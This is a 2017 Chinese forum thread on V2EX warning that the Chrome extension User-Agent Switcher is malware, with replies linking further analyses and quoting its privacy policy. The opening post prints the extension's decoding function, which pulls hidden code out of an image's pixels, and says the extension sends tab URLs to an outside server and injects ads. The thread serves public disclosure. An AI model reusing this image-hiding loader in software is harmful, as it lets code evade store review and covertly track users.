V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
anoymoux
V2EX  ›  浏览器

大家注意了 Chrome 的插件 User-Agent Switcher 是个木马

  anoymoux · 2017-09-09 06:27:10 +08:00 · 54532 次点击
这是一个创建于 2634 天前的主题,其中的信息可能已经有所发展或是发生改变。
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619

112 条回复    2020-09-05 20:48:27 +08:00
1  2  
chanssl
    101
chanssl  
   2017-09-10 20:09:20 +08:00
日狗了,竟然是恶意程序,中奖了
Bailang
    102
Bailang  
   2017-09-10 21:15:38 +08:00
chroming
    103
chroming  
   2017-09-10 22:54:44 +08:00
突然发现去年就有人发现这个扩展有问题了: https://www.v2ex.com/t/263719
Bailang
    104
Bailang  
   2017-09-11 09:52:04 +08:00
转载 侵删

https://x.threatbook.cn/article?threatInfoID=113
有人贴出了这个 policy

Collected Information.

Accessing and Using the Services.
When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users.
nyanyh
    105
nyanyh  
   2017-09-11 11:52:12 +08:00
@acess omg...我还用着 Better History,有时候 Surge 里看到随机的 dwoqpurpfdjksla.lan 这种奇怪的域名不知道是不是这个扩展搞的
xssnull
    106
xssnull  
   2017-09-12 14:09:03 +08:00
@anoymoux 这个反混淆做的真赞,咋做的分享下啊
cyg07
    107
cyg07  
   2017-09-20 19:10:53 +08:00
@redsonic   @anoymoux @xssnull

360CERT 的具体分析

"Chrome 插件 User – Agent Switcher 恶意代码分析报告 "

http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw
ariza
    108
ariza  
   2017-09-22 10:23:32 +08:00
为毛依然屹立不倒。。
anoymoux
    109
anoymoux  
OP
   2017-09-22 10:45:46 +08:00
@ariza 尴尬..还涨了 5 万用户...
lyragosa
    110
lyragosa  
   2017-10-18 23:32:49 +08:00
我似乎就是这个插件……吓得我赶紧删掉了
iVeego
    111
iVeego  
   2017-11-22 16:53:01 +08:00
@anoymoux #109 越来越多了...😅😅😅
legege007
    112
legege007  
   2020-09-05 20:48:27 +08:00
已下架了
1  2  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5619 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 34ms · UTC 07:19 · PVG 15:19 · LAX 23:19 · JFK 02:19
Developed with CodeLauncher
♥ Do have faith in what you're doing.